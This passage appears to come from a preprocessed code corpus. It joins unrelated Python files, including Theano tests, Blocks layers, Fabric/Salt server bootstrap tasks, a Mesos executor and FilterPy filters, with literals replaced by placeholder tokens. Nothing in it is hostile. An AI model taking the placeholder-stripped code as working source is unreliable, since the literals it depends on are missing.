ndim == <NUM_LIT:0> <EOL> assert "<STR_LIT:int>" in str ( data . start . dtype ) <EOL> data = slice ( int ( data . start ) , data . stop , data . step ) <EOL> elif isinstance ( data . stop , numpy . ndarray ) : <EOL> assert data . stop . ndim == <NUM_LIT:0> <EOL> assert "<STR_LIT:int>" in str ( data . stop . dtype ) <EOL> data = slice ( data . start , int ( data . stop ) , data . step ) <EOL> elif isinstance ( data . step , numpy . ndarray ) : <EOL> assert data . step . ndim == <NUM_LIT:0> <EOL> assert "<STR_LIT:int>" in str ( data . step . dtype ) <EOL> data = slice ( data . start , int ( data . stop ) , data . step ) <EOL> Constant . __init__ ( self , type , data , name ) <EOL> def signature ( self ) : <EOL> return ( SliceConstant , self . data . start , self . data . stop , self . data . step ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , <EOL> self . data . start , <EOL> self . data . stop , <EOL> self . data . step ) <EOL> SliceType . Constant = SliceConstant <EOL> class NoneTypeT ( Generic ) : <EOL> """<STR_LIT>""" <EOL> def filter ( self , x , strict = False , allow_downcast = None ) : <EOL> if x is None : <EOL> return x <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> @ staticmethod <EOL> def may_share_memory ( a , b ) : <EOL> return False <EOL> none_type_t = NoneTypeT ( ) <EOL> NoneConst = Constant ( none_type_t , None , name = '<STR_LIT>' ) </s>
from theano.tests.record import *
from theano import function
from six.moves import xrange, StringIO
from theano.tensor import iscalar


def test_record_good():
    """<STR_LIT>"""
    # Record a known sequence of lines into an in-memory file.
    output = StringIO()
    recorder = Record(file_object=output, replay=False)

    num_lines = <NUM_LIT:10>

    for i in xrange(num_lines):
        recorder.handle_line(str(i) + '<STR_LIT:\n>')

    # The recorded transcript is exactly the lines we fed in.
    output_value = output.getvalue()
    assert output_value == '<STR_LIT>'.join(str(i) + '<STR_LIT:\n>' for i in xrange(num_lines))

    # Replaying the identical sequence must pass without raising.
    output = StringIO(output_value)
    playback_checker = Record(file_object=output, replay=True)

    for i in xrange(num_lines):
        playback_checker.handle_line(str(i) + '<STR_LIT:\n>')


def test_record_bad():
    """<STR_LIT>"""
    # Record a known sequence of lines.
    output = StringIO()
    recorder = Record(file_object=output, replay=False)

    num_lines = <NUM_LIT:10>

    for i in xrange(num_lines):
        recorder.handle_line(str(i) + '<STR_LIT:\n>')

    # Replay half of it correctly, then feed a mismatching line: the
    # checker must raise MismatchError.
    output_value = output.getvalue()
    output = StringIO(output_value)
    playback_checker = Record(file_object=output, replay=True)

    for i in xrange(num_lines // <NUM_LIT:2>):
        playback_checker.handle_line(str(i) + '<STR_LIT:\n>')

    try:
        playback_checker.handle_line('<STR_LIT>')
    except MismatchError:
        return
    raise AssertionError("<STR_LIT>"
                         "<STR_LIT>")


def test_record_mode_good():
    """<STR_LIT>"""
    # Record both explicit lines and the events RecordMode emits while
    # running a compiled function.
    output = StringIO()
    recorder = Record(file_object=output, replay=False)
    record_mode = RecordMode(recorder)

    i = iscalar()
    f = function([i], i, mode=record_mode, name='<STR_LIT:f>')

    num_lines = <NUM_LIT:10>

    for i in xrange(num_lines):
        recorder.handle_line(str(i) + '<STR_LIT:\n>')
        f(i)

    # Replaying the same interleaving with a fresh function must pass.
    output_value = output.getvalue()
    output = StringIO(output_value)
    playback_checker = Record(file_object=output, replay=True)
    playback_mode = RecordMode(playback_checker)

    i = iscalar()
    f = function([i], i, mode=playback_mode, name='<STR_LIT:f>')

    for i in xrange(num_lines):
        playback_checker.handle_line(str(i) + '<STR_LIT:\n>')
        f(i)


def test_record_mode_bad():
    """<STR_LIT>"""
    # Record a full run ...
    output = StringIO()
    recorder = Record(file_object=output, replay=False)
    record_mode = RecordMode(recorder)

    i = iscalar()
    f = function([i], i, mode=record_mode, name='<STR_LIT:f>')

    num_lines = <NUM_LIT:10>

    for i in xrange(num_lines):
        recorder.handle_line(str(i) + '<STR_LIT:\n>')
        f(i)

    # ... replay half of it, then diverge: MismatchError expected.
    output_value = output.getvalue()
    output = StringIO(output_value)
    playback_checker = Record(file_object=output, replay=True)
    playback_mode = RecordMode(playback_checker)

    i = iscalar()
    f = function([i], i, mode=playback_mode, name='<STR_LIT:f>')

    for i in xrange(num_lines // <NUM_LIT:2>):
        playback_checker.handle_line(str(i) + '<STR_LIT:\n>')
        f(i)

    try:
        f(<NUM_LIT:0>)
    except MismatchError:
        return
    raise AssertionError("<STR_LIT>")
"""<STR_LIT>"""
import logging

from theano import tensor

from blocks.bricks.base import application, Brick, lazy
from blocks.bricks.interfaces import Activation, Feedforward, Initializable
from blocks.bricks.interfaces import LinearLike, Random
from blocks.bricks.wrappers import WithExtraDims
from blocks.roles import add_role, WEIGHT, BIAS
from blocks.utils import shared_floatx_nans

logger = logging.getLogger(__name__)


class Linear(LinearLike, Feedforward):
    r"""<STR_LIT>"""

    @lazy(allocation=['<STR_LIT>', '<STR_LIT>'])
    def __init__(self, input_dim, output_dim, **kwargs):
        super(Linear, self).__init__(**kwargs)
        self.input_dim = input_dim
        self.output_dim = output_dim

    def _allocate(self):
        # Allocate W: (input_dim, output_dim), filled with NaNs until the
        # initialization scheme runs; track its L2 norm as an auxiliary.
        W = shared_floatx_nans((self.input_dim, self.output_dim), name='<STR_LIT>')
        add_role(W, WEIGHT)
        self.parameters.append(W)
        self.add_auxiliary_variable(W.norm(<NUM_LIT:2>), name='<STR_LIT>')
        if self.use_bias:
            b = shared_floatx_nans((self.output_dim,), name='<STR_LIT:b>')
            add_role(b, BIAS)
            self.parameters.append(b)
            self.add_auxiliary_variable(b.norm(<NUM_LIT:2>), name='<STR_LIT>')

    @application(inputs=['<STR_LIT>'], outputs=['<STR_LIT>'])
    def apply(self, input_):
        """<STR_LIT>"""
        # Affine map: input_ . W (+ b when use_bias is set).
        output = tensor.dot(input_, self.W)
        if self.use_bias:
            output += self.b
        return output

    def get_dim(self, name):
        if name == '<STR_LIT>':
            return self.input_dim
        if name == '<STR_LIT>':
            return self.output_dim
        # NOTE(review): no `return` here — presumably the base get_dim
        # raises for unknown names, making a return value unnecessary;
        # confirm against the Brick base class.
        super(Linear, self).get_dim(name)


class Bias(Feedforward, Initializable):
    """<STR_LIT>"""

    @lazy(allocation=['<STR_LIT>'])
    def __init__(self, dim, **kwargs):
        super(Bias, self).__init__(**kwargs)
        self.dim = dim

    def _allocate(self):
        # output_dim is an alias of dim (see the property at class bottom).
        b = shared_floatx_nans((self.output_dim,), name='<STR_LIT:b>')
        add_role(b, BIAS)
        self.parameters.append(b)

    def _initialize(self):
        b, = self.parameters
        self.biases_init.initialize(b, self.rng)

    @application(inputs=['<STR_LIT>'], outputs=['<STR_LIT>'])
    def apply(self, input_):
        """<STR_LIT>"""
        b, = self.parameters
        return input_ + b

    def get_dim(self, name):
        if name in ['<STR_LIT>', '<STR_LIT>']:
            return self.dim
        # NOTE(review): no `return`, same pattern as Linear.get_dim above.
        super(Bias, self).get_dim(name)

    def _get_dim(self):
        return self.dim

    def _set_dim(self, value):
        self.dim = value

    # input_dim and output_dim are both synonyms for dim: a bias does not
    # change the dimensionality.
    input_dim = output_dim = property(_get_dim, _set_dim)


class Maxout(Brick):
    """<STR_LIT>"""

    @lazy(allocation=['<STR_LIT>'])
    def __init__(self, num_pieces, **kwargs):
        super(Maxout, self).__init__(**kwargs)
        self.num_pieces = num_pieces

    @application(inputs=['<STR_LIT>'], outputs=['<STR_LIT>'])
    def apply(self, input_):
        """<STR_LIT>"""
        # Split the last dimension into (output_dim, num_pieces) and take
        # the max over the pieces.
        last_dim = input_.shape[-<NUM_LIT:1>]
        output_dim = last_dim // self.num_pieces
        new_shape = ([input_.shape[i] for i in range(input_.ndim - <NUM_LIT:1>)] +
                     [output_dim, self.num_pieces])
        output = tensor.max(input_.reshape(new_shape, ndim=input_.ndim + <NUM_LIT:1>),
                            axis=input_.ndim)
        return output


class LinearMaxout(Initializable, Feedforward):
    """<STR_LIT>"""

    @lazy(allocation=['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'])
    def __init__(self, input_dim, output_dim, num_pieces, **kwargs):
        super(LinearMaxout, self).__init__(**kwargs)
        self.linear = Linear()
        self.maxout = Maxout()
        self.children = [self.linear,
                         self.maxout]

        self.input_dim = input_dim
        self.output_dim = output_dim
        self.num_pieces = num_pieces

    @property
    def input_dim(self):
        # Delegated to the child Linear brick.
        return self.linear.input_dim

    @input_dim.setter
    def input_dim(self, value):
        self.linear.input_dim = value

    def _push_allocation_config(self):
        # The linear layer produces num_pieces candidates per output unit,
        # which the maxout brick then reduces.
        self.linear.output_dim = self.output_dim * self.num_pieces
        self.maxout.num_pieces = self.num_pieces

    @application(inputs=['<STR_LIT>'], outputs=['<STR_LIT>'])
    def apply(self, input_):
        """<STR_LIT>"""
        pre_activation = self.linear.apply(input_)
        output = self.maxout.apply(pre_activation)
        return output


class Identity(Activation):
    @application(inputs=['<STR_LIT>'], outputs=['<STR_LIT>'])
    def apply(self, input_):
        return input_


class Tanh(Activation):
    @application(inputs=['<STR_LIT>'], outputs=['<STR_LIT>'])
    def apply(self, input_):
        return tensor.tanh(input_)


class Logistic(Activation):
    @application(inputs=['<STR_LIT>'], outputs=['<STR_LIT>'])
    def apply(self, input_):
        return tensor.nnet.sigmoid(input_)


class Softplus(Activation):
    r"""<STR_LIT>"""
    @application(inputs=['<STR_LIT>'], outputs=['<STR_LIT>'])
    def apply(self, input_):
        return tensor.nnet.softplus(input_)


class Rectifier(Activation):
    @application(inputs=['<STR_LIT>'], outputs=['<STR_LIT>'])
    def apply(self, input_):
        return tensor.switch(input_ > <NUM_LIT:0>, input_, <NUM_LIT:0>)


class Softmax(Brick):
    """<STR_LIT>"""

    @application(inputs=['<STR_LIT>'], outputs=['<STR_LIT>'])
    def apply(self, input_):
        """<STR_LIT>"""
        return tensor.nnet.softmax(input_)

    @application(inputs=['<STR_LIT>'], outputs=['<STR_LIT>'])
    def log_probabilities(self, input_):
        """<STR_LIT>"""
        # Numerically stable log-softmax: shift by the row max before
        # exponentiating.
        shifted = input_ - input_.max(axis=<NUM_LIT:1>, keepdims=True)
        return shifted - tensor.log(
            tensor.exp(shifted).sum(axis=<NUM_LIT:1>, keepdims=True))

    @application(inputs=['<STR_LIT:y>', '<STR_LIT:x>'], outputs=['<STR_LIT>'])
    def categorical_cross_entropy(self, application_call, y, x):
        """<STR_LIT>"""
        x = self.log_probabilities(x)
        application_call.add_auxiliary_variable(
            x.copy(name='<STR_LIT>'))
        if y.ndim == x.ndim - <NUM_LIT:1>:
            # Integer class targets: pick the log-probability of the true
            # class for each row via flat indexing.
            indices = tensor.arange(y.shape[<NUM_LIT:0>]) * x.shape[<NUM_LIT:1>] + y
            cost = -x.flatten()[indices]
        elif y.ndim == x.ndim:
            # Distribution targets: full cross-entropy against y.
            cost = -(x * y).sum(axis=<NUM_LIT:1>)
        else:
            raise TypeError('<STR_LIT>')
        return cost


class NDimensionalSoftmax(Softmax):
    # WithExtraDims lifts the 2-d Softmax applications to N-d inputs.
    decorators = [WithExtraDims()]
<s> from fuel . datasets . base import ( Dataset , IterableDataset , <EOL> IndexableDataset ) <EOL> from fuel . datasets . hdf5 import H5PYDataset <EOL> from fuel . datasets . adult import Adult <EOL> from fuel . datasets . binarized_mnist import BinarizedMNIST <EOL> from fuel . datasets . cifar10 import CIFAR10 <EOL> from fuel . datasets . cifar100 import CIFAR100 <EOL> from fuel . datasets . caltech101_silhouettes import CalTech101Silhouettes <EOL> from fuel . datasets . iris import Iris <EOL> from fuel . datasets . mnist import MNIST <EOL> from fuel . datasets . svhn import SVHN <EOL> from fuel . datasets . text import TextFile <EOL> from fuel . datasets . billion import OneBillionWord </s>
<s> from theano import tensor <EOL> from theano . tensor . nnet import conv2d <EOL> def weights_std ( weights , mask_outputs = None ) : <EOL> positions = tensor . arange ( weights . shape [ <NUM_LIT:2> ] ) <EOL> expected = ( weights * positions ) . sum ( axis = <NUM_LIT:2> ) <EOL> expected2 = ( weights * positions ** <NUM_LIT:2> ) . sum ( axis = <NUM_LIT:2> ) <EOL> result = ( expected2 - expected ** <NUM_LIT:2> ) ** <NUM_LIT:0.5> <EOL> if mask_outputs : <EOL> result *= mask_outputs <EOL> return result . sum ( ) / weights . shape [ <NUM_LIT:0> ] <EOL> def monotonicity_penalty ( weights , mask_x = None ) : <EOL> cumsums = tensor . cumsum ( weights , axis = <NUM_LIT:2> ) <EOL> penalties = tensor . maximum ( cumsums [ <NUM_LIT:1> : ] - cumsums [ : - <NUM_LIT:1> ] , <NUM_LIT:0> ) . sum ( axis = <NUM_LIT:2> ) <EOL> if mask_x : <EOL> penalties *= mask_x [ <NUM_LIT:1> : ] <EOL> return penalties . sum ( ) <EOL> def entropy ( weights , mask_x ) : <EOL> entropies = ( weights * tensor . log ( weights + <NUM_LIT> ) ) . sum ( axis = <NUM_LIT:2> ) <EOL> entropies *= mask_x <EOL> return entropies . sum ( ) <EOL> def conv1d ( sequences , masks , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> sequences = tensor . as_tensor_variable ( sequences ) <EOL> masks = tensor . as_tensor_variable ( masks ) <EOL> image = sequences . dimshuffle ( '<STR_LIT:x>' , '<STR_LIT:x>' , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> filters = masks . dimshuffle ( <NUM_LIT:0> , '<STR_LIT:x>' , '<STR_LIT:x>' , <NUM_LIT:1> ) <EOL> result = conv2d ( image , filters , ** kwargs ) <EOL> result = result . dimshuffle ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> ) <EOL> return result . reshape ( result . shape [ : - <NUM_LIT:1> ] , ndim = <NUM_LIT:3> ) <EOL> def pad_to_a_multiple ( tensor_ , k , pad_with ) : <EOL> """<STR_LIT>""" <EOL> new_length = ( <EOL> tensor . ceil ( tensor_ . shape [ <NUM_LIT:0> ] . astype ( '<STR_LIT>' ) / k ) * k ) . astype ( '<STR_LIT>' ) <EOL> new_shape = tensor . set_subtensor ( tensor_ . 
shape [ : <NUM_LIT:1> ] , new_length ) <EOL> canvas = tensor . alloc ( pad_with , tensor . prod ( new_shape ) ) . reshape ( <EOL> new_shape , ndim = tensor_ . ndim ) <EOL> return tensor . set_subtensor ( canvas [ : tensor_ . shape [ <NUM_LIT:0> ] ] , tensor_ ) </s>
<s> import time <EOL> from fabric . api import env , run , sudo <EOL> from fabric . context_managers import settings as fabric_settings <EOL> from fabric . contrib . files import append , comment , sed , uncomment <EOL> from fabric . operations import reboot <EOL> import settings <EOL> DISTRO = "<STR_LIT>" <EOL> SALT_INSTALLERS = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def bootstrap ( ) : <EOL> """<STR_LIT>""" <EOL> base_packages = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> run ( "<STR_LIT>" ) <EOL> run ( "<STR_LIT>" ) <EOL> append ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> run ( "<STR_LIT>" ) <EOL> run ( "<STR_LIT>" ) <EOL> run ( "<STR_LIT>" . format ( pkgs = "<STR_LIT:U+0020>" . join ( base_packages ) ) ) <EOL> append ( "<STR_LIT>" , "<STR_LIT>" . format ( env . master_server . private_ip ) ) <EOL> uncomment ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> comment ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> with fabric_settings ( warn_only = True ) : <EOL> reboot ( ) <EOL> def install_salt ( installer = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> if installer == "<STR_LIT>" : <EOL> run ( "<STR_LIT>" ) <EOL> elif installer == "<STR_LIT>" : <EOL> run ( "<STR_LIT>" ) <EOL> else : <EOL> raise NotImplementedError ( ) <EOL> def setup_salt ( ) : <EOL> """<STR_LIT>""" <EOL> server = [ s for s in env . bootmachine_servers if s . public_ip == env . host ] [ <NUM_LIT:0> ] <EOL> if env . host == env . master_server . public_ip : <EOL> append ( "<STR_LIT>" , "<STR_LIT>" . format ( <EOL> settings . REMOTE_STATES_DIR ) ) <EOL> append ( "<STR_LIT>" , "<STR_LIT>" . format ( <EOL> settings . REMOTE_PILLARS_DIR ) ) <EOL> run ( "<STR_LIT>" ) <EOL> sed ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" . format ( env . master_server . private_ip ) ) <EOL> sed ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" . format ( server . name ) ) <EOL> append ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for role in server . roles : <EOL> append ( "<STR_LIT>" , "<STR_LIT>" . 
format ( role ) ) <EOL> run ( "<STR_LIT>" ) <EOL> run ( "<STR_LIT>" ) <EOL> def start_salt ( ) : <EOL> """<STR_LIT>""" <EOL> with fabric_settings ( warn_only = True ) : <EOL> if env . host == env . master_server . public_ip : <EOL> sudo ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:3> ) <EOL> sudo ( "<STR_LIT>" ) <EOL> def stop_salt ( ) : <EOL> """<STR_LIT>""" <EOL> with fabric_settings ( warn_only = True ) : <EOL> if env . host == env . master_server . public_ip : <EOL> sudo ( "<STR_LIT>" ) <EOL> sudo ( "<STR_LIT>" ) <EOL> def restart_salt ( ) : <EOL> """<STR_LIT>""" <EOL> stop_salt ( ) <EOL> start_salt ( ) </s>
<s> from __future__ import print_function <EOL> import site <EOL> site . addsitedir ( '<STR_LIT>' ) <EOL> site . addsitedir ( '<STR_LIT>' ) <EOL> import sys <EOL> import time <EOL> from threading import Thread <EOL> from mesos . interface import Executor , mesos_pb2 <EOL> from mesos . native import MesosExecutorDriver <EOL> class MinimalExecutor ( Executor ) : <EOL> def launchTask ( self , driver , task ) : <EOL> def run_task ( ) : <EOL> update = mesos_pb2 . TaskStatus ( ) <EOL> update . task_id . value = task . task_id . value <EOL> update . state = mesos_pb2 . TASK_RUNNING <EOL> driver . sendStatusUpdate ( update ) <EOL> print ( task . data ) <EOL> time . sleep ( <NUM_LIT:30> ) <EOL> update = mesos_pb2 . TaskStatus ( ) <EOL> update . task_id . value = task . task_id . value <EOL> update . state = mesos_pb2 . TASK_FINISHED <EOL> driver . sendStatusUpdate ( update ) <EOL> thread = Thread ( target = run_task , args = ( ) ) <EOL> thread . start ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> driver = MesosExecutorDriver ( MinimalExecutor ( ) ) <EOL> sys . exit ( <NUM_LIT:0> if driver . run ( ) == mesos_pb2 . DRIVER_STOPPED else <NUM_LIT:1> ) </s>
<s> """<STR_LIT>""" <EOL> from numpy import array , asarray , isscalar , eye , dot <EOL> from functools import reduce <EOL> def dot3 ( A , B , C ) : <EOL> """<STR_LIT>""" <EOL> return dot ( A , dot ( B , C ) ) <EOL> def dot4 ( A , B , C , D ) : <EOL> """<STR_LIT>""" <EOL> return dot ( A , dot ( B , dot ( C , D ) ) ) <EOL> def dotn ( * args ) : <EOL> """<STR_LIT>""" <EOL> return reduce ( dot , args ) <EOL> def runge_kutta4 ( y , x , dx , f ) : <EOL> """<STR_LIT>""" <EOL> k1 = dx * f ( y , x ) <EOL> k2 = dx * f ( y + <NUM_LIT:0.5> * k1 , x + <NUM_LIT:0.5> * dx ) <EOL> k3 = dx * f ( y + <NUM_LIT:0.5> * k2 , x + <NUM_LIT:0.5> * dx ) <EOL> k4 = dx * f ( y + k3 , x + dx ) <EOL> return y + ( k1 + <NUM_LIT:2> * k2 + <NUM_LIT:2> * k3 + k4 ) / <NUM_LIT> <EOL> def setter ( value , dim_x , dim_y ) : <EOL> """<STR_LIT>""" <EOL> v = array ( value , dtype = float ) <EOL> if v . shape != ( dim_x , dim_y ) : <EOL> raise Exception ( '<STR_LIT>' . format ( dim_x , dim_y ) ) <EOL> return v <EOL> def setter_1d ( value , dim_x ) : <EOL> """<STR_LIT>""" <EOL> v = array ( value , dtype = float ) <EOL> shape = v . shape <EOL> if shape [ <NUM_LIT:0> ] != ( dim_x ) or v . ndim > <NUM_LIT:2> or ( v . ndim == <NUM_LIT:2> and shape [ <NUM_LIT:1> ] != <NUM_LIT:1> ) : <EOL> raise Exception ( '<STR_LIT>' . format ( shape , dim_x , <NUM_LIT:1> ) ) <EOL> return v <EOL> def setter_scalar ( value , dim_x ) : <EOL> """<STR_LIT>""" <EOL> if isscalar ( value ) : <EOL> v = eye ( dim_x ) * value <EOL> else : <EOL> v = array ( value , dtype = float ) <EOL> dim_x = v . shape [ <NUM_LIT:0> ] <EOL> if v . shape != ( dim_x , dim_x ) : <EOL> raise Exception ( '<STR_LIT>' . format ( dim_x , dim_x ) ) <EOL> return v </s>
<s> """<STR_LIT>""" <EOL> from numpy import array , asarray , dot , ones , outer , sum , zeros <EOL> class MMAEFilterBank ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filters , p , dim_x , H = None ) : <EOL> """<STR_LIT>""" <EOL> assert len ( filters ) == len ( p ) <EOL> assert dim_x > <NUM_LIT:0> <EOL> self . filters = filters <EOL> self . p = asarray ( p ) <EOL> self . dim_x = dim_x <EOL> self . _x = None <EOL> @ property <EOL> def x ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _x <EOL> @ property <EOL> def P ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _P <EOL> def predict ( self , u = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> for f in self . filters : <EOL> f . predict ( u ) <EOL> def update ( self , z , R = None , H = None ) : <EOL> """<STR_LIT>""" <EOL> for i , f in enumerate ( self . filters ) : <EOL> f . update ( z , R , H ) <EOL> self . p [ i ] *= f . likelihood <EOL> self . p /= sum ( self . p ) <EOL> self . _P = zeros ( self . filters [ <NUM_LIT:0> ] . P . shape ) <EOL> is_row_vector = ( self . filters [ <NUM_LIT:0> ] . x . ndim == <NUM_LIT:1> ) <EOL> if is_row_vector : <EOL> self . _x = zeros ( self . dim_x ) <EOL> for f , p in zip ( self . filters , self . p ) : <EOL> self . _x += dot ( f . x , p ) <EOL> else : <EOL> self . _x = zeros ( ( self . dim_x , <NUM_LIT:1> ) ) <EOL> for f , p in zip ( self . filters , self . p ) : <EOL> self . _x = zeros ( ( self . dim_x , <NUM_LIT:1> ) ) <EOL> self . _x += dot ( f . x , p ) <EOL> for x , f , p in zip ( self . _x , self . filters , self . p ) : <EOL> y = f . x - x <EOL> self . _P += p * ( outer ( y , y ) + f . P ) </s>
<s> from setuptools import setup , find_packages <EOL> from codecs import open <EOL> from os import path <EOL> import filterpy <EOL> here = path . abspath ( path . dirname ( __file__ ) ) <EOL> with open ( path . join ( here , '<STR_LIT>' ) , encoding = '<STR_LIT:utf-8>' ) as f : <EOL> long_description = f . read ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = filterpy . __version__ , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> keywords = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' ] ) , <EOL> install_requires = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> package_data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } , <EOL> ) </s>
<s> from __future__ import division <EOL> import numpy as np <EOL> from lfd . environment import simulation_object <EOL> from lfd . mmqe . search import beam_search <EOL> from lfd . rapprentice . knot_classifier import isKnot as is_knot <EOL> class ActionSelection ( object ) : <EOL> def __init__ ( self , registration_factory ) : <EOL> """<STR_LIT>""" <EOL> self . registration_factory = registration_factory <EOL> def plan_agenda ( self , scene_state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> class GreedyActionSelection ( ActionSelection ) : <EOL> def plan_agenda ( self , scene_state , timestep ) : <EOL> action2q_value = self . registration_factory . batch_cost ( scene_state ) <EOL> q_values , agenda = zip ( * sorted ( [ ( q_value , action ) for ( action , q_value ) in action2q_value . items ( ) ] ) ) <EOL> return ( agenda , q_values ) , False <EOL> class FeatureActionSelection ( ActionSelection ) : <EOL> def __init__ ( self , registration_factory , features , actions , demos , <EOL> width , depth , simulator = None , lfd_env = None ) : <EOL> self . features = features <EOL> self . actions = actions . keys ( ) <EOL> self . demos = demos <EOL> self . width = width <EOL> self . depth = depth <EOL> self . transferer = simulator <EOL> self . lfd_env = lfd_env <EOL> super ( FeatureActionSelection , self ) . __init__ ( registration_factory ) <EOL> def plan_agenda ( self , scene_state , timestep ) : <EOL> def evaluator ( state , ts ) : <EOL> try : <EOL> score = np . dot ( self . features . features ( state , timestep = ts ) , self . features . weights ) + self . features . w0 <EOL> except : <EOL> return - np . inf * np . r_ [ np . ones ( len ( self . features . weights ) ) ] <EOL> return score <EOL> def simulate_transfer ( state , action , next_state_id ) : <EOL> aug_traj = self . transferer . transfer ( self . demos [ action ] , state , plotting = False ) <EOL> self . lfd_env . 
execute_augmented_trajectory ( aug_traj , step_viewer = <NUM_LIT:0> ) <EOL> result_state = self . lfd_env . observe_scene ( ) <EOL> for sim_obj in self . lfd_env . sim . sim_objs : <EOL> if isinstance ( sim_obj , simulation_object . RopeSimulationObject ) : <EOL> rope_sim_obj = sim_obj <EOL> break <EOL> rope_knot = is_knot ( rope_sim_obj . rope . GetControlPoints ( ) ) <EOL> return ( result_state , next_state_id , rope_knot ) <EOL> return beam_search ( scene_state , timestep , self . features . src_ctx . seg_names , simulate_transfer , <EOL> evaluator , self . lfd_env . sim , width = self . width , <EOL> depth = self . depth ) </s>
<s> import cv2 , numpy as np <EOL> class Colors : <EOL> RED = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:255> ) <EOL> GREEN = ( <NUM_LIT:0> , <NUM_LIT:255> , <NUM_LIT:0> ) <EOL> BLUE = ( <NUM_LIT:255> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> class ClickGetter : <EOL> xy = None <EOL> done = False <EOL> def callback ( self , event , x , y , _flags , _param ) : <EOL> if self . done : <EOL> return <EOL> elif event == cv2 . EVENT_LBUTTONDOWN : <EOL> self . xy = ( x , y ) <EOL> self . done = True <EOL> def get_click ( windowname , img ) : <EOL> cg = ClickGetter ( ) <EOL> cv2 . setMouseCallback ( windowname , cg . callback ) <EOL> while not cg . done : <EOL> cv2 . imshow ( windowname , img ) <EOL> cv2 . waitKey ( <NUM_LIT:10> ) <EOL> return cg . xy <EOL> def draw_img ( img , colormap = None , min_size = <NUM_LIT:1> ) : <EOL> if img . dtype == np . bool : <EOL> img = img . astype ( '<STR_LIT>' ) <EOL> if img . dtype == np . float32 or img . dtype == np . float64 : <EOL> img = img . astype ( "<STR_LIT>" ) <EOL> minval = img . min ( ) <EOL> maxval = img . max ( ) <EOL> img = ( img - minval ) / ( maxval - minval ) <EOL> img = ( img * <NUM_LIT> ) . astype ( '<STR_LIT>' ) <EOL> if img . shape [ <NUM_LIT:0> ] < min_size : <EOL> ratio = int ( np . ceil ( float ( min_size ) / img . shape [ <NUM_LIT:0> ] ) ) <EOL> img = cv2 . resize ( img , ( img . shape [ <NUM_LIT:0> ] * ratio , img . shape [ <NUM_LIT:1> ] * ratio ) ) <EOL> if colormap is not None : <EOL> img = colormap [ img ] <EOL> cv2 . imshow ( "<STR_LIT>" , img ) <EOL> cv2 . waitKey ( ) <EOL> cv2 . destroyWindow ( "<STR_LIT>" ) <EOL> def tile_images ( imgs , nrows , ncols , row_titles = None , col_titles = None , max_width = <NUM_LIT:1000> ) : <EOL> assert nrows * ncols >= len ( imgs ) <EOL> if nrows * ncols > len ( imgs ) : <EOL> imgs = [ img for img in imgs ] <EOL> imgs . extend ( [ np . zeros_like ( imgs [ <NUM_LIT:0> ] ) for _ in xrange ( nrows * ncols - len ( imgs ) ) ] ) <EOL> full_width = imgs [ <NUM_LIT:0> ] . 
shape [ <NUM_LIT:1> ] * ncols <EOL> if full_width > max_width : <EOL> ratio = float ( max_width ) / full_width <EOL> for i in xrange ( len ( imgs ) ) : <EOL> imgs [ i ] = cv2 . resize ( imgs [ i ] , ( int ( imgs [ i ] . shape [ <NUM_LIT:1> ] * ratio ) , int ( imgs [ i ] . shape [ <NUM_LIT:0> ] * ratio ) ) ) <EOL> if col_titles is not None : raise NotImplementedError <EOL> imgrows = [ ] <EOL> for irow in xrange ( nrows ) : <EOL> rowimgs = imgs [ irow * ncols : ( irow + <NUM_LIT:1> ) * ncols ] <EOL> if row_titles is not None : <EOL> rowimgs [ <NUM_LIT:0> ] = rowimgs [ <NUM_LIT:0> ] . copy ( ) <EOL> cv2 . putText ( rowimgs [ <NUM_LIT:0> ] , row_titles [ irow ] , ( <NUM_LIT:10> , <NUM_LIT:10> ) , cv2 . FONT_HERSHEY_PLAIN , <NUM_LIT:1> , ( <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:0> ) , thickness = <NUM_LIT:1> ) <EOL> imgrows . append ( np . concatenate ( rowimgs , <NUM_LIT:1> ) ) <EOL> bigimg = np . concatenate ( imgrows , <NUM_LIT:0> ) <EOL> return bigimg <EOL> def label2rgb ( labels ) : <EOL> max_label = labels . max ( ) 